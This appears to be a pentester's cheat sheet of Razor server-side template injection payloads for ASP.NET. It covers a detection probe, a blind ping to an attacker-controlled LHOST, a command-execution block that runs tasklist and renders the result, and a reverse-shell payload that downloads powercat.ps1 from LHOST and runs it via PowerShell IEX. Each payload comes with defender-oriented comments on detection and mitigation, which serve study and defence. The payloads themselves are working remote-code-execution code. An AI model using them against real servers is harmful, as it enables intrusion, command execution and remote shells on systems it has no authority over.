SSTI ASP

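ASP.NET Razor Engine

The snippets below execute only when attacker-controlled text is compiled as Razor template source. Input passed as model data to a fixed template is HTML-encoded on output and is not evaluated.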

Detection

@* Arithmetic probe: Razor evaluates the expression on the server, so a response
   showing 72 instead of the literal text means the input was compiled as a template.
   The same probe works as a regression test once the injection point is fixed. *@
@(8*9)

RCE Check - Blind - Wait a minute

@* Blind check: nothing is written to the response; the only effect is two echo
   requests (ping -n 2) sent to LHOST, a placeholder for the tester's own host.
   Defender view: the process hosting the application (w3wp.exe under IIS) spawning
   cmd.exe and ping.exe, and ICMP leaving a web server, are both worth alerting on. *@
@{System.Diagnostics.Process.Start("cmd.exe","/c ping -n 2 LHOST");}

Task List

@* Runs "cmd /c tasklist /v" on the server and renders its stdout and stderr in the page.
   Defender view: the process hosting the application (w3wp.exe under IIS) becomes the
   parent of cmd.exe and tasklist.exe, which normal request handling rarely produces;
   process-creation logging with command lines makes this visible. *@
@{
    // Command line is fixed here; nothing in this snippet reads request data.
    System.Diagnostics.ProcessStartInfo procStartInfo = new System.Diagnostics.ProcessStartInfo("cmd", "/c tasklist /v");

    // Capture both streams so they can be read into strings below.
    procStartInfo.RedirectStandardOutput = true;
    procStartInfo.RedirectStandardError = true;
    // Stream redirection requires UseShellExecute to be false.
    procStartInfo.UseShellExecute = false;
    // No console window is created for the child process.
    procStartInfo.CreateNoWindow = true;
    System.Diagnostics.Process p = new System.Diagnostics.Process();
    p.StartInfo = procStartInfo;
    p.Start();
    // Each stream is read to the end, then '<' and '>' are replaced with entities.
    // NOTE(review): Razor HTML-encodes @stdout / @stderr by default, so these manual
    // replacements are presumably double-encoded in the rendered page; confirm.
    var stdout = p.StandardOutput.ReadToEnd().Replace("<", "&lt;").Replace(">", "&gt;");
    var stderr = p.StandardError.ReadToEnd().Replace("<", "&lt;").Replace(">", "&gt;");
}
@* Output is written into the HTTP response body, so the result is visible to whoever sent the request. *@
<pre>@stdout</pre>
<pre style="color: red">@stderr</pre>

Reverse Shell Powercat - OK

@* Starts cmd.exe, which starts PowerShell with -nop (no profile) to download a script
   from LHOST over HTTP and run it in memory via IEX; LHOST is a placeholder.
   Defender view: a web worker -> cmd.exe -> powershell.exe chain whose command line
   contains IEX and DownloadString is a high-confidence indicator. PowerShell script
   block logging records the downloaded script, and restricting outbound HTTP from
   web servers stops the fetch. The root fix is to never compile user input as a
   Razor template. *@
@{System.Diagnostics.Process.Start("cmd.exe","/c powershell -nop -c IEX(New-Object System.Net.WebClient).DownloadString('http://LHOST/powercat.ps1')");}
